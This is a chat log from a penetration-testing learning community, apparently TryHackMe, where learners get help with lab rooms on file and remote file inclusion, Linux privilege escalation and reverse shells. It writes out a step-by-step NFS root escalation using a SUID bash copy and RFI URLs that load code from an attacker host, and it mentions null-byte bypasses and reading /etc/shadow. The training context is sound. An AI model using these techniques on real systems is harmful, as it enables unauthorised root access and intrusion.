Im on mobile so I cant have a really good look but I think this is the part youre looking for
no im on the source code already
just dont understand about what directory he talks about ...
Which browser are you using
Yeah
so he says in this case the all stored in the same directory but what is the directory and how do i see it on the source code
yep
Assets/ is a directory for instance
In that dir, there might be files like stylesheets
In script tags youll find paths to external js files
and if i want to see this directory i just need to add /assets ?
to the url
ohh i get it
yeah i found it !
Cool
so in source code of a website there can be either 1 directory like in our case or more ?
However the dev set it up
for example i could have 3 directorys to search on ?
But assets is a common dir
or usually its 1
It will likely be one ( assets is kind of the norm ) but it doesnt have to be
It can be anything but assets, styles or scripts as dir names are common
so in assets usually the web developer will put the external images/links etc ?
images you can put in images/ folder, things that you upload can go in upload/
Fonts maybe
so its important when i do a pentest to check the source code carefully
sounds like its one of the most important things
or maybe im just in the beginning of the beginning lol
is good to check source code. might be some interesting stuff indeed.
ok ty guys
Have fun
@still swift it might help to check out a random site on github
You can find my website publicly for instance on github. If you look at the directories there, you may get a better idea of what it looks like from the developers side
And then it will make more sense too I hope. its not complicated but it helps to see it perhaps
oh cool! could you send me yours ?
i mean if its important i wanna dive deeper yeah
Here for instance you see that I used: styles, scripts and assets
So its just another way of structuring my files
so scripts is where the dev puts his script for interactive parts of his web
and style is the css files for how the web will look to the public side
the frontend
Can be. But some put styles and images and scripts in /assets together
But yes thats about right. Css is the presentation ( the style ), scripts are the interactive parts and html is the markup
btw do you think i need to learn program language to become a pentester ?
because this is my goal to land a job and start a career
Exactly, this is a very simple site but when there are frameworks involved, the project structures get a bit more complex. But it usually comes down to the same thing
or it is not a must
Best ask someone else. I can only really tell you anything about development ( thats my field ). Some folks in here say you should, others say you dont need to. I think most agree its at least useful to be able to understand / read code to some extent
You could ask in #cyber-and-careers about those kinds of things
i think ill learn python
Thats probably a good choice imo
once i finish all the paths for pentesting and red team
But dont take this advice from me, haha
No worries!
I will say knowing a programming language to help you write up scripts to automate or make certain functions easier to execute repeatedly isn't a bad idea, it will make you more efficient however it isn't strictly necessary.
thanks alot !
Gave +1 Rep to @echo meteor
Hi, can someone give me a hand understanding last challenge (#3) in the File Inclusion module?
In the challenge section
I tried to bypass the filters using GET, POST and COOKIE methods but none of them seems to work... i'm just lost
I also used burpsuite to be more precise
Best to show a screenshot of your request in burp
that's what i modified
POST request and the PATH value
i completed the challenge using curl from terminal
but still i don't understand why it doesn't work by doing this on burp
If you intercepted the request as GET, you can use right click to change it to POST, this will add a necessary header that you are missing in that screenshot
Okay so changing the method in the "request attributes" doesn't change it effectively?
Oh
i got it now
I mean it does, but you would have to manually add another header for the POST request, the right click function of burp is doing that for you automatically
i changed the method using the inspect element, and yes i got a new header "file" which worked now
thank you!
Gave +1 Rep to @shadow echo
Someone here?
yuup yuups
stuck with in a room.... ask for tips and solved alone after... xD
oh okay glad you could figure it out yourself... other wise there are lots of people here to help you solve said problems
its late here, im gonna try tomorrow with clean head, ty
Gave +1 Rep to @steel nymph
hey i've completed it a week ago. if u're still stuck u can dm me i'll help you
ty for the help
Gave +1 Rep to @pastel willow
Hi, I know this is quite an old message, but I've run into the exact same problem. If you happen to remember an explanation or if anyone else can explain why the query doesn't work, I'd really appreciate the help.
EDIT: nevermind, figured it out with a bit more digging through the server! But I will have to dig more online later to figure out why ||"like 'sql__four'"|| caused the sleep delay even though the db name ||has something else in place of the first _|| ? Leaving the edited comment instead of deleting the question in case someone else gets stuck and searches the same DB name looking for help. Happy New Year, y'all!
Ah, an explanation of SQL like operator that explains the problem: https://www.w3schools.com/sql/sql_like.asp
Glad to hear!
Hi
I have one doubt
Let say I am using a module in msfconsole which has an option PASSWORD.
Can we pass a path to rockyou.txt to this like we do
set PASSWORD 'path to rockyou' ?
No, that won't work
cool thanks for confirming
hey guys
im at subdomain enumeration room task 6 -virtual hosts
when i put the 2nd command using ffuf like they show there its not working but when i put the 1st one its working
can someone help ?
what is the size that i need to provide in the command that is what i didnt understand
Hello, i was completing the "Linux Privilege Escalation" room and in the task 7 I had to exploit SUID files to escalate privileges, but i couldn't find any SUID files that can get me root access. The /usr/bin/base64 had the SUID bit set so i used it to read contents of /etc/shadow and obtain password hashes and crack them. The flag was located in a directory which the user user2 could access; using the password i cracked i obtained the flag, but my main question is: did i skip anything or did i obtain the flag the intended way? i took a look at writeups, but they too used similar techniques.
tried every RE exploit for the Vulnerability Capstone -> Exploit Machine final question keep getting this weird "non-numeric value" errors on all the exploits...
In Lab #2, what is the directory specified in the include function?
Warning: include(includes/test) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab2.php on line 26
Warning: include() [function.include]: Failed opening 'includes/test' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab2.php on line 26
File inclusion room task 4
ok nvm got the ans
Can you share a screenshot ?? You have to first verify yourself for it
Hi, I have a problem with the task Linux PrivEsc: NFS, after compiling the exploit I'm getting this error:
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
Is this normal? Should I try with another version of gcc?
I finished Jr Pentester a few days ago what are some good follow on CTF's and paths?
for ctfs:
biohazard
agent sudo
bounty hacker
lazy admin
overpass 1-3
thanks man, I solved it.
Gave +1 Rep to @deft rain
Hi, I'm having a problem in the Linux Escalation Room for Kernel. My wget's are timing out. I can't reach out for anything. I gave up for the night and will try again tomorrow. Not really a question but advice welcome.
Can you share a screenshot of what wget command ??
Unfortunately not. I shutdown before remembering to do that. I was tired. I tried the same command on my personal kali box though and it pulled the file immediately, but in the room it continued to time out. I'll try again later today.
Ping me if you face the same issue again
Will do. Thanks. I'm hoping this evening I'll get back to it.
Which function is causing the directory traversal in Lab #4?
file_get_contents
really asking a question that have no ans available.. forced to waste time searching for an ans
What you mean, it's in the task text ?
Okay, so the first one was found in the task text, the 2nd one was found in the warning by e.g. trying to include a file that doesn't exist
This morning I tried again, I have screenshots for the attempt. It was better than last night as wget actually appeared to be working. Then it got a permission denied error. Just set everything up again and now I can't type in the room - tried restarting the room as well, no dice, still wont accept keyboard input and its a terminal style room. I'll try again tomorrow.
Last night the wget would just timeout. I also tried going directly to the source where the exploit can be downloaded from but that times out as well. Thinking its just the way the room is setup to allow items from the attackbox but not open internet? Thanks for your input.
I had yesterday the same problem and could not wget to the raw file in the exploit database nor http.server. Have not found a solution
If you can check if you have that file in the same directory where you have started the server.
You're talking about the target machine right? I think that could be because they don't have internet access. You have to download the raw exploit in your attacking machine and then wget it
Hi everyone, i have an issue with the last task in the room "Cross-Site Scripting". It's recommended to use the attack box to resolve the last question but i have an error with firefox (certificate issue). I can't access http://ip.p.thmlabs.com/
I can't get past the warning since I have a gateway time out
hey mickko, can you verify yourself and share a screenshot here ??
ok, i send a screenshoot
!docs verify
!notifyme
Ok @harsh epoch, you will now be notified of future announcements.
That's not how that url should be, it should have dashes - instead of dots in the "IP"
But the room should give you the right URL anyways if there even is such a way of accessing the target machine
With my own VM, i can access the web site but can't retrieve the cookies' value to answer the question
Note: You may encounter issues with receiving the request using your own VM and the VPN. It is recommended you use the AttackBox for this task.
Gotcha, but that may not solve the issue with not being able to receive the staff-session cookie on your own VM
Now i can access the website on the attack box using dashes, so i will be able to answer the question
On the attackbox you can also just use the IP, rather than that URL
But you'll see if it works or not, just trying to give you a heads up
Room completed, thx for your help
Gave +1 Rep to @shadow echo
Affirmative.
Hey! i have some questions in the challenge from the networking security module
the last section (the challenge) says that you have to do a scan without being detected from the IDS, but what does it mean? that we must achieve 0%?
i did a scan with only 4% of detection but i haven't got a flag. maybe because i didn't scan all ports?
don't recall where the sweet spot was but you need to be somewhere under 10% detected but more detected than 0%
also had to do the scan from the attackbox and not shadows own machine or it was stuck on 0%
that could be the reason, i'm using my own VM
did u scan all ports? for what u recall
the detection works fine: if i don't use fragmentation the % goes crazy
think shadow tried both all ports and only the top 1000 most common ones
ok thanks for feedback, i'm giving a try on the attackbox
I got it, looks like it was my VM. thank you!
Thanks, @deft rain ! I got it to work, I went back to the tmp folder where I was originally and this time my wget worked! Not the first time, but it did. Thanks for offering your help the other evening and reminding me about being in the correct folder when I started my simple server via Python. It is nice to know when I'm on the correct path, and when I'm making mistakes so I learn from them.
Gave +1 Rep to @deft rain
Is it possible to do LFI through cookies? (:
your value is wrong
the flag 3 its similar to flag 2, but with POST method
you need to put the path of flag2 on value
this is gonna fail, because .php you need to ignore this with %00 at the end
its the best thing i can do to help you without giving you the answer xD
its a hard challenge, dont worry
Stuck in "What the Shell" Task 13 questions. Opened linux machine and logged on, set up a listener , have error message:
-bash: syntax error near unexpected token `('
What am I doing wrong? Thanks for any help.
@steel nymph I thought I could use it; I was having trouble figuring out which shell I should try to upload. Where should I have looked? (Thanks for pointing this out.)
I'm an extreme noob, fwiw
I'm not a pro and my english is not the best but I'll try to answer... php is the language of web servers, thanks to it you can interact with the server like login or comment posts among other things. But in this case you are connecting to a system (not a web) through ssh protocol. When you are already connected to it, you gotta think that you are in another vm (in this case linux, but could be windows or anything else).
Gave +1 Rep to @lunar anvil
Then the shell can't be a php, gotta be a .sh (bash script)
Google it and you'll see that is even easier than a webshell
@limpid lily Your English is great! Thank you so much, I'll google it.
Gave +1 Rep to @limpid lily
I'm on task 11 of Privilege Escalation and getting a problem when I try to run my NFS executable in the room. This has happened with both creating the executable on my personal kali and on the THM kali. Apparently glibc 2.31 (the version running on the room) cannot run executables compiled with glibc 2.35 which is the version on the THM Kali and my box is running 2.36-4. Does anyone have an idea of a workaround for this?
yuup cross compiling issues... live off the land instead.... also known as copy the /bin/bash executable from the target into the nfs share then give it the right perms and finally run it with ./bash -p
what is -p supposed to do? because I just tried that and received the same error message as before. Thank you!
Gave +1 Rep to @sage current
that is specific to bash
-p Turn on privileged mode. In this mode, the $ENV and $BASH_ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS, BASHOPTS, CDPATH,
and GLOBIGNORE variables, if they appear in the environment, are ignored. If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p
option is not supplied, these actions are taken and the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset.
Turning this option off causes the effective user and group ids to be set to the real user and group ids.
is what it does for bash
it will spawn a bash instance with euid of root which you can see with the id command
meaning you can do root stuffs
thanks for the explanation, tried it.
gcc is not installed, and ./bash -p does not escalate
If ./bash -p is not giving you a root shell you might have done something wrong along the way, so probably your bash binary is not having SUID set and/or owned by root
I've rerun everything by what the room says and by various researches over 6 times today along, it is task 11 of the linux privilege escalation. i am setting this aside now and will try again another day. if you look above, i'm getting a compiler compatibility error. using ./bash -p was shadow's suggestion. unfortunately for me, it did not help with my compatibility problem. my binary is compiled in 2.35 and the room runs on 2.31. GCC is not installed according to the errors I am receiving so i cannot compile it on the host machine.
Did you check the link I posted for you ?
Also what shadow suggested was that you transfer the bash binary (the one that is already present by default, thus being compatible) from the target machine to your attacking machine, then set SUID and the root owner and place the bash binary back to the target machine via the NFS share which is having the no_root_squash option set
yuup exactly that
Yes, I did what shadow suggested. It was one of the several things I tried today before deciding to pause and go with fresh eyes later/tomorrow. I did look at the link, I will look at it again.
Edit to add: I just reread the link you shared and there is a piece of it I think will help that I may have missed earlier. Thank you.
Thank you both for your help!
EZ question I hope: What is my tun0 IP ? Is it the IP of the target machine?
No the IP of your own machine when it connects to the vpn. Basically a vpn ip
Thank you @shadow echo and @sage current -static fixed the problem and allowed the code to compile properly. Shadow, I still don't know what I did wrong earlier that your suggestion did not give access sooner. I appreciate what you said though and I've made note of it. I was not frustrated at your suggestion, just frustrated that I had tried it and i couldn't get it to work.
Gave +1 Rep to @shadow echo
- @sage current
Gave +1 Rep to @sage current
As many days as you need to understand the concepts behind it
on target machine:
cp /bin/bash /path/to/nfs/share/folder
on attack machine:
sudo chown root:root /path/to/mounted/nfs/share/bash
sudo chmod +sx /path/to/mounted/nfs/share/bash
on target machine:
/path/to/nfs/share/folder/bash -p
id
tada it now shows that you got an effective user id of root
Thanks! You just found my mistake. I missed one word in the syntax from what you posted. Thank you for teaching me something.
Gave +1 Rep to @sage current
What do you guys advice to do after jr.penetration path? i'm close to finish it,but i feel like i need some practice, are there some machines that could be rooted by having the path's knowledge? Also what could be a subsequence of jr.pen path?
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#878393611929129000 (optional)
#pentest-plus-path (optional)
#web-fundamentals-path
#soc-level-1-path
#offensive-pentesting-path
#red-teaming-path
#791764435991658556
is shadows recommended order to do the paths in... the ones marked optional have little new content after completing the previous paths but are still worth doing...
if you are looking for ctfs to do after completing this path searching for easy ctfs using the learn hacktivities page is easy enough and gives you quite a long list of challenges to do if you feel like it
thank you, i will look into it
Gave +1 Rep to @sage current
no problem
Having a bit of an issue with a tool that it asked me to download SecList.
It seems that it's not finding the file and Ive even resorted to copy/paste. Here's my screen.
Well I would include a picture but guess I can't. It says no such file or directory even though I can cd into that area and still fails. Ive tried installing SecList twice.
Ok I found it. There's a typo on THM where it says SecList. It's not. It's seclist bc capitalization is important.
You have to verify yourself to share a picture / screenshot
!docs verify
What do they mean by/what is a connection?
What room is this?
But most likely a rev shell connection that is getting sent from the target machine to your attacking machines listener
Privilege Escalation: What the Shell?
What exactly is a "connection"? are they talking about tcp?
It is typically tcp, yes
udp shells anyone???
payload/cmd/unix/reverse_socat_udp
was more of an ask if someone uses them for tryhackme not if there existed ones
Ah okay
i always wondered why would someone prefer udp over tcp for rev shells, what are the advantages? i mean udp is faster but isn't stable as tcp
hiding as dns by using your shell over port 53
though obviously that is not fool proof
hey i've completed the cronjobs privesc but i have some doubts about it which the guide doesn't talk about. I've made all the steps told, but in the end i couldn't get the reverse shell, it felt like the cron job wasn't "working". I found eventually that i needed to change permission of the file in order to make it work. So if we find a cron job that could be used to gain root we need to make the script executable?
yuup unless the script is already executable
ye because it makes sense but i got a bit surprised the task didn't even talk about it
even root can't run files which don't have the executable bit set
and yeah probably weird that it is not mentioned in the text
the thing that fooled me was that if the cron exists it means it's been executing for a while, at least that's what i thought would be the logic behind it, maybe it's been designed this way intentionally?
what i mean is having a cronjob which never executes it's pretty useless lol
i'm probably too tired rn, ty for help anyway
well common misconfiguration
where you forget to remove the script after making it not run anymore
yeah i just think too superficially some times, need to check everything
also missing the executable bit on cron priv esc is super common so don't beat yourself because of it
hi everyone
im stuck at Task 11 from Privilege Escalation
the nfs one
i do all what it requires and i have this
can someone help me?
Transfer the target machines own bash binary to your attacking machine and redo the steps, this will make sure the binary is compatible with the target machine
@humble lantern just add -static when compiling with gcc
thanks
is a bad solution as even then there are a lot of things that can go wrong with cross compiling
the living off the land approach is harder to detect and also will work in nearly every possible instance there is
@sage current it does it's job and gives you root
by that logic you should use pwnkit on every tryhackme machine you can because it gives you root
even though you are stubbing your learning opportunity
by that logic every PE learning material & technique would require hours on each video per technique, which for sure wouldn't be beginner friendly
learning to copy the bash of the target and then changing the perms using nfs would take hours???
i meant going extra mile with thorough compiling
on target machine:
cp /bin/bash /path/to/nfs/share/folder
on attack machine:
sudo chown root:root /path/to/mounted/nfs/share/bash
sudo chmod +sx /path/to/mounted/nfs/share/bash
on target machine:
/path/to/nfs/share/folder/bash -p
id
tada it now shows that you got an effective user id of root
is the entire list of things you need to do to use the bash approach and it will work on every target machine that has bash and nfs with no_root_squash
and is also exactly how the nfs vuln was shown off in an earlier room which shadow also finds as the better approach
as you rarely should need to compile code for hacking
I'm trying to do that (have the same gcc problem) but when i try to use the cp command, i get permission denied
make sure you are in the right folders... also slight chance that bash is in /usr/bin/bash instead
mh yeah i tried to copy it into another folder and it worked
there were 3 nfs shares with the 'no_root_squash' option
yeah you want the one called backup that is located in the /tmp folder as pretty much everyone can write there
this is if shadow recalls correctly
yes exactly, i was using the one in the ubuntu/sharedfolder
then there is the /tmp one
but now i need to unmount it right? cause the tmp share doesn't work even if i remounted it again
well it could also be just empty
i did umount on the previous folder because it didn't seem to work but i fixed it now
i changed the permission with the SUID set but when i execute bash -p nothing happens
i mean, i don't get root, i'm missing something
-rwsrwsrwx 1 root root 1183448 Jan 11 19:54 bash
that's the result on the target machine
first you run ./bash -p then you run id and note the effective uid being root
you need to specify that you are running the bash from the nfs share dir of course
thank you, i used ./bash but i forgot the -p flag
what does it do anyway? (the -p flag)
nvm chatgpt got it for me ahah thanks for all the help!
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from
the environment, the SHELLOPTS, BASHOPTS, CDPATH, and GLOBIGNORE variables, if they appear in the environment, are ignored, and the effective user id is set to the real user id. If the -p option is
supplied at invocation, the startup behavior is the same, but the effective user id is not reset.
New to this discord and currently on this path, just wanted to check in and say hello
Quick question - I'm in the room File Inclusion - task 6 (Remote File Inclusion - RFI) - RFI Steps. Am i meant to be able to access http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt in the task? It asks me to try out an RFI attack but not sure what to do. Please see image. Any help would be massively appreciated.
No, you are meant to access http://10.10.54.137/playground.php to do the RFI task
I can access that, no problem. I'm struggling with the command to run cmd.txt from a remote machine. I'm assuming that's what the task requires me to do .
Okay, and with what you struggle exactly?
Ok sorry, should have been more clear. It's asking me to run an RFI attack. I thought it was to run the cmd.txt file from the http://attacker.thm/ . Is that not correct? or am i missing the point completely. Many thanks.
Gave +1 Rep to @shadow echo
Attacker.thm refers to your attacking machine, so replacing attacker.thm with your attacking machine IP where you serve your cmd.txt file
Thanks, I thought that and tried it but it did not work. I will look again and try and sort it before coming back to you. Appreciate the help
Well, how are you serving that file?
Do you have a python webserver started to host that file?
No not at all, I'm just following the room and it doesn't mention that.
Let's say that the attacker hosts a PHP file on their own server
Before, I created my own cmd.txt file on my attacking machine and tried to put the link to it into the include on the task. I guess i need to have that folder as a webserver?
If you are not familiar with how to easily serve files, google "python http server to serve files"
Ok, I will, Thanks. I'm doing this through the attackbox, I'm working through the room but it doesn't mention anywhere that i need to do this. I'm just following the suggested path of learning.
Gave +1 Rep to @shadow echo
I see, well it mentions to serve that on your own web server, and that python http server module is kind of a basic thing you probably need very often on your journey, it would have been explained in the "Linux Fundamentals" rooms, which I recommend to do
I've done those rooms, I will go back and check it again, I can't remember seeing that
Thanks for your help
Gave +1 Rep to @shadow echo
It's in linux fundamentals 3
You are welcome
Ok I will look, I think my path of learning took me to fundamentals 1 & 2, not 3. But then again I've done quite a bit lately and could have easily have forgotten I've done it. Cheers.
Hi again, sorry to be a pain. I've created a file (cmd.txt) in a directory and started the python server in that directory, see image attached. Now I'm receiving an error in the browser, see second image. The URL in the browser is http://10.10.37.161/playground.php?file=http://10.10.171.206/RFI_Task/cmd.txt , really starting to wonder if i'm really going to grasp this, been fine so far. Any help as always much appreciated.
and second person that missed the port number inside 2 days... for this exact same rfi lesson
Thanks, Sorry for this, I've put in the port number (been back and looked at my fundamentals), The server is saying the file does not exist
Gave +1 Rep to @steel nymph
don't worry shadow just likes keeping count of specific types of problems and errors
Well, it's time for a break... I've sorted it, Thank you so much for your help, all is clear now. Just going to sit in the corner with my big D hat on.
Gave +1 Rep to @steel nymph
I'm sure i can come up with some new ones to count
Hey guys, I kinda got stuck at Burp Suite: Intruder task 12, since I couldn't find my sessions tab on burp, maybe you guys want to change that in the text from Switch over to the "Project Options" tab, then the "Sessions" sub-tab.
To settings > sessions
Hi guys stuck up with Introduction to web hacking (walking an application ) room, can anyone help me to view page source of Acme IT Support website??
do the basic path first and then do this one
do this first
i have completed the room earlier to this but in the walking an application room i'm not able to view the source page
ooh someone referring to shadow's list thanks
Open the page for which you want to see the source code.
Right-click on an empty space on the page. A drop-down menu will appear. ...
Select 'View Page Source' in the drop-down menu. The source code will open in a new tab.
this? xD
Start the virtual machine on this task, wait 2 minutes, and visit the following URL: https://LAB_WEB_URL.p.thmlabs.com (this URL will update 2 minutes from when you start the machine)
@modern niche ?
I'm also on this one xD
Anyone tried to reverse shell on the playground? Can't seem to understand why it's not working with php-reverse-shell.php
hmm good question
shadow got a webshell on that, which they upgraded to a reverse shell, but dunno if the php-reverse-shell.php by pentest monkey works for it or why it would not work
I managed to do it eventually I just had to edit the script to my vpn Ip and then it worked...